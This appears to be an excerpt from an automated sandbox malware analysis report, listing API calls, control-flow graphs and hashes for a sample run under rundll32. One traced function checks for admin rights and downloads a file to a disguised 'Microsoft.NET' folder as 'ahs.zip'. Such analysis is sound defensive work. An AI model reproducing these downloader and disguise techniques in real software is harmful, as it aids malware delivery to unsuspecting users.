                              • LeaveCriticalSection.KERNEL32(0461CC14,0461CC14,00000000,043CDF98,?,?,?,00000000,?,043CE860,00000000,043CE8BF,?,?,00000000,00000000), ref: 043CDED6
                              • LeaveCriticalSection.KERNEL32(0461CC14,0461CC14,00000000,043CDF98,?,?,?,00000000,?,043CE860,00000000,043CE8BF,?,?,00000000,00000000), ref: 043CDEE5
                              • IsValidLocale.KERNEL32(00000000,00000002,0461CC14,0461CC14,00000000,043CDF98,?,?,?,00000000,?,043CE860,00000000,043CE8BF), ref: 043CDEF7
                              • EnterCriticalSection.KERNEL32(0461CC14,00000000,00000002,0461CC14,0461CC14,00000000,043CDF98,?,?,?,00000000,?,043CE860,00000000,043CE8BF), ref: 043CDF54
                              • LeaveCriticalSection.KERNEL32(0461CC14,0461CC14,00000000,00000002,0461CC14,0461CC14,00000000,043CDF98,?,?,?,00000000,?,043CE860,00000000,043CE8BF), ref: 043CDF7D
                              Strings
                              Memory Dump Source
                              • Source File: 0000000C.00000002.2474320110.00000000043C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 043C0000, based on PE: true
                              • Associated: 0000000C.00000002.2474294843.00000000043C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 0000000C.00000002.2474320110.00000000043DC000.00000020.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 0000000C.00000002.2474577843.0000000004611000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 0000000C.00000002.2474604926.0000000004617000.00000008.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 0000000C.00000002.2474631109.0000000004618000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 0000000C.00000002.2474658298.000000000461F000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 0000000C.00000002.2474684559.0000000004623000.00000008.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 0000000C.00000002.2474712649.0000000004625000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 0000000C.00000002.2474740803.0000000004626000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 0000000C.00000002.2474740803.0000000004628000.00000002.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_12_2_43c0000_rundll32.jbxd
                              Similarity
                              • API ID: CriticalSection$Leave$Enter$LocaleValid
                              • String ID: en-GB,en,en-US,
                              • API String ID: 975949045-3021119265
                              • Opcode ID: 93aeb03d81dda519b4d53d0cc19c78f9e937d15c103fd6e5b85614b1b7f184b9
                              • Instruction ID: 879d31ac36548e6fb4b638a6e1e5d27abefa6622733c5e1c4269285079ec9c14
                              • Opcode Fuzzy Hash: 93aeb03d81dda519b4d53d0cc19c78f9e937d15c103fd6e5b85614b1b7f184b9
                              • Instruction Fuzzy Hash: 5921E1A0780794BBFF10B7789C1562DA29AAF8574DF94753DF00097290EEA4BC4087A2
                              Uniqueness

                              Uniqueness Score: -1.00%

                              Control-flow Graph

                              • Executed
                              • Not Executed
                              control_flow_graph 134 43d1a04-43d1a9e call 43d1eb4 call 43d1ec4 call 43d1ed4 call 43d1ee4 * 3 147 43d1ac8-43d1ad5 134->147 148 43d1aa0-43d1ac3 RaiseException 134->148 150 43d1ada-43d1afa 147->150 151 43d1ad7 147->151 149 43d1cd8-43d1cde 148->149 152 43d1b0d-43d1b15 150->152 153 43d1afc-43d1b0b call 43d1ef4 150->153 151->150 155 43d1b18-43d1b21 152->155 153->155 157 43d1b3a-43d1b3c 155->157 158 43d1b23-43d1b33 155->158 159 43d1bfe-43d1c08 157->159 160 43d1b42-43d1b49 157->160 158->157 166 43d1b35 158->166 163 43d1c18-43d1c1a 159->163 164 43d1c0a-43d1c16 159->164 161 43d1b59-43d1b5b 160->161 162 43d1b4b-43d1b57 160->162 167 43d1b5d-43d1b66 LoadLibraryA 161->167 168 43d1b68-43d1b6a 161->168 162->161 169 43d1c1c-43d1c20 163->169 170 43d1c67-43d1c69 163->170 164->163 171 43d1cb6-43d1cbd 166->171 167->168 175 43d1b6c-43d1b7b GetLastError 168->175 176 43d1bb7-43d1bc3 call 43d12f8 168->176 178 43d1c5b-43d1c65 GetProcAddress 169->178 179 43d1c22-43d1c26 169->179 172 43d1c6b-43d1c7a GetLastError 170->172 173 43d1cb1-43d1cb4 170->173 185 43d1cbf-43d1cce 171->185 186 43d1cd6 171->186 181 43d1c7c-43d1c88 172->181 182 43d1c8a-43d1c8c 172->182 173->171 183 43d1b7d-43d1b89 175->183 184 43d1b8b-43d1b8d 175->184 192 43d1bf8-43d1bf9 FreeLibrary 176->192 193 43d1bc5-43d1bc9 176->193 178->170 179->178 187 43d1c28-43d1c33 179->187 181->182 182->173 189 43d1c8e-43d1cae RaiseException 182->189 183->184 184->176 190 43d1b8f-43d1bb2 RaiseException 184->190 185->186 186->149 187->178 191 43d1c35-43d1c3b 187->191 189->173 190->149 191->178 196 43d1c3d-43d1c4a 191->196 192->159 193->159 198 43d1bcb-43d1bd9 LocalAlloc 193->198 196->178 197 43d1c4c-43d1c57 196->197 197->178 199 43d1c59 197->199 198->159 200 43d1bdb-43d1bf6 198->200 199->173 200->159
                              APIs
                              • RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 043D1ABC
                              Memory Dump Source
                              • Source File: 0000000C.00000002.2474320110.00000000043C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 043C0000, based on PE: true
                              • Associated: 0000000C.00000002.2474294843.00000000043C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 0000000C.00000002.2474320110.00000000043DC000.00000020.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 0000000C.00000002.2474577843.0000000004611000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 0000000C.00000002.2474604926.0000000004617000.00000008.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 0000000C.00000002.2474631109.0000000004618000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 0000000C.00000002.2474658298.000000000461F000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 0000000C.00000002.2474684559.0000000004623000.00000008.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 0000000C.00000002.2474712649.0000000004625000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 0000000C.00000002.2474740803.0000000004626000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 0000000C.00000002.2474740803.0000000004628000.00000002.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_12_2_43c0000_rundll32.jbxd
                              Similarity
                              • API ID: ExceptionRaise
                              • String ID:
                              • API String ID: 3997070919-0
                              • Opcode ID: 9289d419fb3587acc44daa6462daf6d895ffc80d6e6b64165a3bce5468d167b4
                              • Instruction ID: 7d45f7b536d8bfaa7834b2bb18b7a2a3517bfa453c6e1f6ccee2e181fb23e6fa
                              • Opcode Fuzzy Hash: 9289d419fb3587acc44daa6462daf6d895ffc80d6e6b64165a3bce5468d167b4
                              • Instruction Fuzzy Hash: BCA15276A007099FDF15DFA8E880BEEB7B5FF48310F18511AE509A7284EB74B944CB50
                              Uniqueness

                              Uniqueness Score: -1.00%

                              Control-flow Graph

                              APIs
                              • IsUserAnAdmin.SHELL32 ref: 045FD108
                              • GetMessageW.USER32(?,00000000,00000000,00000000), ref: 045FD18A
                                • Part of subcall function 043E6358: GetFileAttributesW.KERNEL32(00000000,?,?,?,?,?,045FD12F,00000000,045FD1B1), ref: 043E636E
                                • Part of subcall function 043E6DC8: CreateDirectoryW.KERNEL32(00000000,00000000,?,045FD13D,00000000,045FD1B1), ref: 043E6DD5
                                • Part of subcall function 04605DCC: Sleep.KERNEL32(0000012C,00000000,04605E82), ref: 04605E03
                                • Part of subcall function 04605DCC: URLDownloadToFileW.URLMON(00000000,00000000,00000000,00000000,00000000), ref: 04605E20
                                • Part of subcall function 04605DCC: Sleep.KERNEL32(0000012C,0000012C,00000000,04605E82), ref: 04605E5A
                              Strings
                              • C3312E937EE0C1D40820B7C1234FD3F6D25BA532031EED7B40262483E03B2E1C268CCA9A99BF76276A57E69E3C3367AF87E9253027DCA581621977496336AF, xrefs: 045FD14B
                              • C:\Program Files (x86)\Microsoft.NET\base, xrefs: 045FD125, 045FD133
                              • C:\Program Files (x86)\Microsoft.NET\ahs.zip, xrefs: 045FD15F
                              Memory Dump Source
                              • Source File: 0000000C.00000002.2474320110.00000000043DC000.00000020.00000001.01000000.00000003.sdmp, Offset: 043C0000, based on PE: true
                              • Associated: 0000000C.00000002.2474294843.00000000043C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 0000000C.00000002.2474320110.00000000043C1000.00000020.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 0000000C.00000002.2474577843.0000000004611000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 0000000C.00000002.2474604926.0000000004617000.00000008.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 0000000C.00000002.2474631109.0000000004618000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 0000000C.00000002.2474658298.000000000461F000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 0000000C.00000002.2474684559.0000000004623000.00000008.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 0000000C.00000002.2474712649.0000000004625000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 0000000C.00000002.2474740803.0000000004626000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 0000000C.00000002.2474740803.0000000004628000.00000002.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_12_2_43c0000_rundll32.jbxd
                              Similarity
                              • API ID: FileSleep$AdminAttributesCreateDirectoryDownloadMessageUser
                              • String ID: C3312E937EE0C1D40820B7C1234FD3F6D25BA532031EED7B40262483E03B2E1C268CCA9A99BF76276A57E69E3C3367AF87E9253027DCA581621977496336AF$C:\Program Files (x86)\Microsoft.NET\ahs.zip$C:\Program Files (x86)\Microsoft.NET\base
                              • API String ID: 3215071381-1565531728
                              • Opcode ID: 3e20486290582fac25806c04051a2eb8ebd27d462dfd0644fcf78a2aa120efdc
                              • Instruction ID: a1d8818db8acd24010a6ff1ad2e19d65ab78108c64faa1b674dca93353a37d59
                              • Opcode Fuzzy Hash: 3e20486290582fac25806c04051a2eb8ebd27d462dfd0644fcf78a2aa120efdc
                              • Instruction Fuzzy Hash: E811AF75604608ABFB10FB64DC41E9E73F9FF48208F501461EB02E7690EA35BD08AA62
                              Uniqueness

                              Uniqueness Score: -1.00%

                              Control-flow Graph

                              • Executed
                              • Not Executed
                              control_flow_graph 225 45b7990-45b79ab PeekMessageW 226 45b7a99-45b7aa0 225->226 227 45b79b1-45b79b5 225->227 228 45b79b7-45b79bf IsWindowUnicode 227->228 229 45b79c5 227->229 228->229 231 45b79c1-45b79c3 228->231 230 45b79c7-45b79d0 229->230 232 45b79e8-45b79fb PeekMessageA 230->232 233 45b79d2-45b79e6 PeekMessageW 230->233 231->230 234 45b79fc-45b79fe 232->234 233->234 234->226 235 45b7a04-45b7a0a 234->235 236 45b7a92 235->236 237 45b7a10-45b7a1c 235->237 236->226 238 45b7a2e-45b7a39 call 45b982c 237->238 239 45b7a1e-45b7a22 237->239 238->226 242 45b7a3b-45b7a46 call 45b7824 238->242 239->238 242->226 245 45b7a48-45b7a4c 242->245 245->226 246 45b7a4e-45b7a59 call 45b76dc 245->246 246->226 249 45b7a5b-45b7a66 call 45b772c 246->249 249->226 252 45b7a68-45b7a73 call 45b7694 249->252 252->226 255 45b7a75-45b7a80 TranslateMessage 252->255 256 45b7a8a-45b7a90 DispatchMessageA 255->256 257 45b7a82-45b7a88 DispatchMessageW 255->257 256->226 257->226
                              APIs
                              • PeekMessageW.USER32(?,00000000,00000000,00000000,00000000), ref: 045B79A4
                              • IsWindowUnicode.USER32 ref: 045B79B8
                              • PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 045B79DB
                              • PeekMessageA.USER32(?,00000000,00000000,00000000,00000001), ref: 045B79F1
                              • TranslateMessage.USER32 ref: 045B7A76
                              • DispatchMessageW.USER32 ref: 045B7A83
                              • DispatchMessageA.USER32 ref: 045B7A8B
                              Memory Dump Source
                              • Source File: 0000000C.00000002.2474320110.00000000043DC000.00000020.00000001.01000000.00000003.sdmp, Offset: 043C0000, based on PE: true
                              • Associated: 0000000C.00000002.2474294843.00000000043C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 0000000C.00000002.2474320110.00000000043C1000.00000020.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 0000000C.00000002.2474577843.0000000004611000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 0000000C.00000002.2474604926.0000000004617000.00000008.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 0000000C.00000002.2474631109.0000000004618000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 0000000C.00000002.2474658298.000000000461F000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 0000000C.00000002.2474684559.0000000004623000.00000008.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 0000000C.00000002.2474712649.0000000004625000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 0000000C.00000002.2474740803.0000000004626000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 0000000C.00000002.2474740803.0000000004628000.00000002.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_12_2_43c0000_rundll32.jbxd
                              Similarity
                              • API ID: Message$Peek$Dispatch$TranslateUnicodeWindow
                              • String ID:
                              • API String ID: 2190272339-0
                              • Opcode ID: 821458f8f5a158cd52de16a6fb59aa20c555f8a148c02809f85f5af0431925a5
                              • Instruction ID: 890abc0b02680cb81d10dabd640b21ad21b80cae2a70305d75b9864583183772
                              • Opcode Fuzzy Hash: 821458f8f5a158cd52de16a6fb59aa20c555f8a148c02809f85f5af0431925a5
                              • Instruction Fuzzy Hash: 1121572130430277FB317A793C41BFE93896FCAB08F144819F4C1AB1C1C792B512A2D2
                              Uniqueness

                              Uniqueness Score: -1.00%

                              Control-flow Graph

                              • Executed
                              • Not Executed
                              control_flow_graph 258 43e6358-43e6378 call 43cb8b4 GetFileAttributesW 261 43e637e-43e6384 258->261 262 43e63ff-43e6407 GetLastError 258->262 263 43e6386-43e638f 261->263 264 43e6394-43e6398 261->264 265 43e6429-43e642b 262->265 266 43e6409-43e640c 262->266 267 43e642f-43e6436 263->267 268 43e639a-43e63b5 CreateFileW 264->268 269 43e63c8-43e63ce 264->269 265->267 266->265 270 43e640e-43e6413 266->270 268->267 271 43e63b7-43e63c6 CloseHandle 268->271 272 43e63d4-43e63ef CreateFileW 269->272 273 43e63d0-43e63d2 269->273 270->265 274 43e6415-43e6418 270->274 271->267 275 43e63fb-43e63fd 272->275 276 43e63f1-43e63f9 CloseHandle 272->276 273->267 274->265 277 43e641a-43e641d 274->277 275->267 276->267 277->265 278 43e641f-43e6422 277->278 278->265 279 43e6424-43e6427 278->279 279->265 280 43e642d 279->280 280->267
                              APIs
                              • GetFileAttributesW.KERNEL32(00000000,?,?,?,?,?,045FD12F,00000000,045FD1B1), ref: 043E636E
                              • CreateFileW.KERNEL32(00000000,80000000,00000001,00000000,00000003,02000000,00000000,00000000,?,?,?,?,?,045FD12F,00000000,045FD1B1), ref: 043E63AD
                              • CloseHandle.KERNEL32(00000000,00000000,80000000,00000001,00000000,00000003,02000000,00000000,00000000,?,?,?,?,?,045FD12F,00000000), ref: 043E63B8
                              • GetLastError.KERNEL32(00000000,?,?,?,?,?,045FD12F,00000000,045FD1B1), ref: 043E63FF
                              Memory Dump Source
                              • Source File: 0000000C.00000002.2474320110.00000000043DC000.00000020.00000001.01000000.00000003.sdmp, Offset: 043C0000, based on PE: true
                              • Associated: 0000000C.00000002.2474294843.00000000043C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 0000000C.00000002.2474320110.00000000043C1000.00000020.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 0000000C.00000002.2474577843.0000000004611000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 0000000C.00000002.2474604926.0000000004617000.00000008.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 0000000C.00000002.2474631109.0000000004618000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 0000000C.00000002.2474658298.000000000461F000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 0000000C.00000002.2474684559.0000000004623000.00000008.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 0000000C.00000002.2474712649.0000000004625000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 0000000C.00000002.2474740803.0000000004626000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 0000000C.00000002.2474740803.0000000004628000.00000002.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_12_2_43c0000_rundll32.jbxd
                              Similarity
                              • API ID: File$AttributesCloseCreateErrorHandleLast
                              • String ID:
                              • API String ID: 2927643983-0
                              • Opcode ID: 3c2ab4a0b07557caa07350c4ae0cdbfad4d8a0bb4ce679d3e52bff24e37af557
                              • Instruction ID: 9602256ec8d9c2506a166cb802b4ea75c8793db03e1804418ba13a7d5210d438
                              • Opcode Fuzzy Hash: 3c2ab4a0b07557caa07350c4ae0cdbfad4d8a0bb4ce679d3e52bff24e37af557
                              • Instruction Fuzzy Hash: 31113433F8B37428FA70212B5CA7B7E194C4B62324FF83E29FB22AA5D1D094B4815511
                              Uniqueness

                              Uniqueness Score: -1.00%

                              Control-flow Graph

                              • Executed
                              • Not Executed
                              control_flow_graph 281 43ca6f8-43ca705 282 43ca70c-43ca740 GetCurrentThreadId 281->282 283 43ca707 281->283 284 43ca744-43ca770 call 43ca5dc 282->284 285 43ca742 282->285 283->282 288 43ca779-43ca780 284->288 289 43ca772-43ca774 284->289 285->284 291 43ca78a-43ca790 288->291 292 43ca782-43ca785 288->292 289->288 290 43ca776 289->290 290->288 293 43ca795-43ca79c 291->293 294 43ca792 291->294 292->291 295 43ca79e-43ca7a5 293->295 296 43ca7ab-43ca7af 293->296 294->293 295->296 297 43caa44-43caa5e 296->297 298 43ca7b5 call 43ca68c 296->298 299 43caa60-43caa6c call 43ca924 call 43ca9ac 297->299 300 43caa71-43caa78 297->300 305 43ca7ba 298->305 299->300 303 43caa7a-43caa85 GetCurrentThreadId 300->303 304 43caa9b-43caa9f 300->304 303->304 307 43caa87-43caa96 call 43ca5fc call 43ca980 303->307 308 43caab9-43caabd 304->308 309 43caaa1-43caaa5 304->309 307->304 310 43caabf-43caac2 308->310 311 43caac9-43caacd 308->311 309->308 314 43caaa7-43caab7 309->314 310->311 315 43caac4-43caac6 310->315 316 43caaec-43caaf5 call 43ca624 311->316 317 43caacf-43caad8 call 43c6f7c 311->317 314->308 315->311 326 43caafc-43cab01 316->326 327 43caaf7-43caafa 316->327 317->316 328 43caada-43caaea call 43c8ea8 call 43c6f7c 317->328 329 43cab1d-43cab28 call 43ca5fc 326->329 330 43cab03-43cab11 call 43ceaec 326->330 327->326 327->329 328->316 339 43cab2d-43cab31 329->339 340 43cab2a 329->340 330->329 338 43cab13-43cab15 330->338 338->329 342 43cab17-43cab18 FreeLibrary 338->342 343 43cab3a-43cab3d 339->343 344 43cab33-43cab35 call 43ca980 339->344 340->339 342->329 345 43cab3f-43cab46 343->345 346 43cab56-43cab67 343->346 344->343 348 43cab4e-43cab51 ExitProcess 345->348 349 43cab48 345->349 346->308 349->348
                              APIs
                              • GetCurrentThreadId.KERNEL32 ref: 043CA72F
                              Memory Dump Source
                              • Source File: 0000000C.00000002.2474320110.00000000043C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 043C0000, based on PE: true
                              • Associated: 0000000C.00000002.2474294843.00000000043C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 0000000C.00000002.2474320110.00000000043DC000.00000020.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 0000000C.00000002.2474577843.0000000004611000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 0000000C.00000002.2474604926.0000000004617000.00000008.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 0000000C.00000002.2474631109.0000000004618000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 0000000C.00000002.2474658298.000000000461F000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 0000000C.00000002.2474684559.0000000004623000.00000008.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 0000000C.00000002.2474712649.0000000004625000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 0000000C.00000002.2474740803.0000000004626000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 0000000C.00000002.2474740803.0000000004628000.00000002.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_12_2_43c0000_rundll32.jbxd
                              Similarity
                              • API ID: CurrentThread
                              • String ID:
                              • API String ID: 2882836952-0
                              • Opcode ID: f0056ff7757128ea47c13b5347fa1eed0208a73c434a84e234489475870857fd
                              • Instruction ID: 5502ec4139c03f51cbe151715267fef77d5e4773d6dcd430ac29bd6ee1b1e26f
                              • Opcode Fuzzy Hash: f0056ff7757128ea47c13b5347fa1eed0208a73c434a84e234489475870857fd
                              • Instruction Fuzzy Hash: 7D517E7460024D9FEB24FFA8C48475A77E0EF08329F18A52EE8458B251D778FC84CB55
                              Uniqueness

                              Uniqueness Score: -1.00%

                              Control-flow Graph

                              • Executed
                              • Not Executed
                              control_flow_graph 350 43c9ffa-43ca007 351 43ca00d-43ca019 350->351 352 43ca120-43ca125 350->352 353 43ca089-43ca090 351->353 354 43ca01b-43ca029 call 43c8bb0 351->354 355 43ca0b0-43ca0d8 RtlUnwind call 43d144c 353->355 356 43ca092-43ca099 353->356 354->352 362 43ca02f-43ca033 354->362 361 43ca0dd-43ca0fe call 43c9f64 355->361 356->355 358 43ca09b-43ca0ae UnhandledExceptionFilter 356->358 358->352 358->355 361->352 362->352 366 43ca039-43ca047 362->366 367 43ca049-43ca055 call 43c9f14 366->367 368 43ca080-43ca086 366->368 367->368 371 43ca057-43ca05e 367->371 368->353 371->368 372 43ca060-43ca06f UnhandledExceptionFilter 371->372 372->352 373 43ca075-43ca07e 372->373 373->355
                              APIs
                              • UnhandledExceptionFilter.KERNEL32(00000006,00000000), ref: 043CA066
                              • UnhandledExceptionFilter.KERNEL32(?,?,?,Function_00009FFC), ref: 043CA0A3
                              • RtlUnwind.KERNEL32(?,?,Function_00009FFC,00000000,?,?,Function_00009FFC,?), ref: 043CA0CE
                              Memory Dump Source
                              • Source File: 0000000C.00000002.2474320110.00000000043C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 043C0000, based on PE: true
                              • Associated: 0000000C.00000002.2474294843.00000000043C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 0000000C.00000002.2474320110.00000000043DC000.00000020.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 0000000C.00000002.2474577843.0000000004611000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 0000000C.00000002.2474604926.0000000004617000.00000008.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 0000000C.00000002.2474631109.0000000004618000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 0000000C.00000002.2474658298.000000000461F000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 0000000C.00000002.2474684559.0000000004623000.00000008.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 0000000C.00000002.2474712649.0000000004625000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 0000000C.00000002.2474740803.0000000004626000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 0000000C.00000002.2474740803.0000000004628000.00000002.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_12_2_43c0000_rundll32.jbxd
                              Similarity
                              • API ID: ExceptionFilterUnhandled$Unwind
                              • String ID:
                              • API String ID: 1141220122-0
                              • Opcode ID: b87339ea1d5940233b6d152b12f8d8231601189559fef9ba0c20dffadc9e69c6
                              • Instruction ID: 81823b613bb25a464dad5fb5520e228899be2de98e3e725cc9022d4725c87629
                              • Opcode Fuzzy Hash: b87339ea1d5940233b6d152b12f8d8231601189559fef9ba0c20dffadc9e69c6
                              • Instruction Fuzzy Hash: 76316FB1604304AFE720EB24D884F67B7E9EF88794F19A65DE54487250DB34FC41CB61
                              Uniqueness

                              Uniqueness Score: -1.00%

                              Control-flow Graph

                              • Executed
                              • Not Executed
                              control_flow_graph 393 45b7bd4-45b7bec 394 45b7bff-45b7c01 393->394 395 45b7bee-45b7bfd call 43c92b4 393->395 396 45b7c05-45b7c79 394->396 395->394 399 45b7c03 395->399 403 45b7c7b-45b7c8b call 43c9194 396->403 404 45b7cef-45b7d03 396->404 399->396 403->404 411 45b7c8d-45b7ca7 call 4500ce4 403->411 405 45b7d21 404->405 406 45b7d05-45b7d15 call 43c9194 404->406 406->405 412 45b7d17-45b7d1a 406->412 415 45b7ca9-45b7ccc GetWindowLongW SetWindowLongW 411->415 416 45b7cd1-45b7cea call 45aa980 411->416 412->405 415->416 416->404
                              APIs
                              • GetWindowLongW.USER32(?,000000EC), ref: 045B7CB5
                              • SetWindowLongW.USER32(?,000000EC,00000000), ref: 045B7CCC
                              Memory Dump Source
                              • Source File: 0000000C.00000002.2474320110.00000000043DC000.00000020.00000001.01000000.00000003.sdmp, Offset: 043C0000, based on PE: true
                              • Associated: 0000000C.00000002.2474294843.00000000043C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 0000000C.00000002.2474320110.00000000043C1000.00000020.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 0000000C.00000002.2474577843.0000000004611000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 0000000C.00000002.2474604926.0000000004617000.00000008.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 0000000C.00000002.2474631109.0000000004618000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 0000000C.00000002.2474658298.000000000461F000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 0000000C.00000002.2474684559.0000000004623000.00000008.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 0000000C.00000002.2474712649.0000000004625000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 0000000C.00000002.2474740803.0000000004626000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 0000000C.00000002.2474740803.0000000004628000.00000002.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_12_2_43c0000_rundll32.jbxd
                              Similarity
                              • API ID: LongWindow
                              • String ID:
                              • API String ID: 1378638983-0
                              • Opcode ID: 28bfbbab077dab3735ea0c1f1e27771b21d4ec043e8a33f5f6fecaed440ab457
                              • Instruction ID: e43755c359b83b0ae73abe77511d4742b26e905676c24120faf4890233b8a544
                              • Opcode Fuzzy Hash: 28bfbbab077dab3735ea0c1f1e27771b21d4ec043e8a33f5f6fecaed440ab457
                              • Instruction Fuzzy Hash: C8414B34A04248EFDB05DF68D884A9DB7F6FF8D314F2185A9E85097351D734AE41EB50
                              Uniqueness

                              Uniqueness Score: -1.00%

                              Control-flow Graph

                              APIs
                              • GetUserDefaultUILanguage.KERNEL32(00000000,043CE8BF,?,?,00000000,00000000,00000000,00000000,00000000,00000000,00000000,?,043CE946,00000000,?,00000105), ref: 043CE853
                              • GetSystemDefaultUILanguage.KERNEL32(00000000,043CE8BF,?,?,00000000,00000000,00000000,00000000,00000000,00000000,00000000,?,043CE946,00000000,?,00000105), ref: 043CE87B
                              Memory Dump Source
                              • Source File: 0000000C.00000002.2474320110.00000000043C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 043C0000, based on PE: true
                              • Associated: 0000000C.00000002.2474294843.00000000043C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 0000000C.00000002.2474320110.00000000043DC000.00000020.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 0000000C.00000002.2474577843.0000000004611000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 0000000C.00000002.2474604926.0000000004617000.00000008.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 0000000C.00000002.2474631109.0000000004618000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 0000000C.00000002.2474658298.000000000461F000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 0000000C.00000002.2474684559.0000000004623000.00000008.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 0000000C.00000002.2474712649.0000000004625000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 0000000C.00000002.2474740803.0000000004626000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 0000000C.00000002.2474740803.0000000004628000.00000002.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_12_2_43c0000_rundll32.jbxd
                              Similarity
                              • API ID: DefaultLanguage$SystemUser
                              • String ID:
                              • API String ID: 384301227-0
                              • Opcode ID: 7d5657c1dbd3366f2ba869ad3cff59c89b2b07a44cbb2e62931116f314fea8a7
                              • Instruction ID: 275168abf18d36fb28d1666c2c0fe6d2262cc48a625746fd373431426dcf83c4
                              • Opcode Fuzzy Hash: 7d5657c1dbd3366f2ba869ad3cff59c89b2b07a44cbb2e62931116f314fea8a7
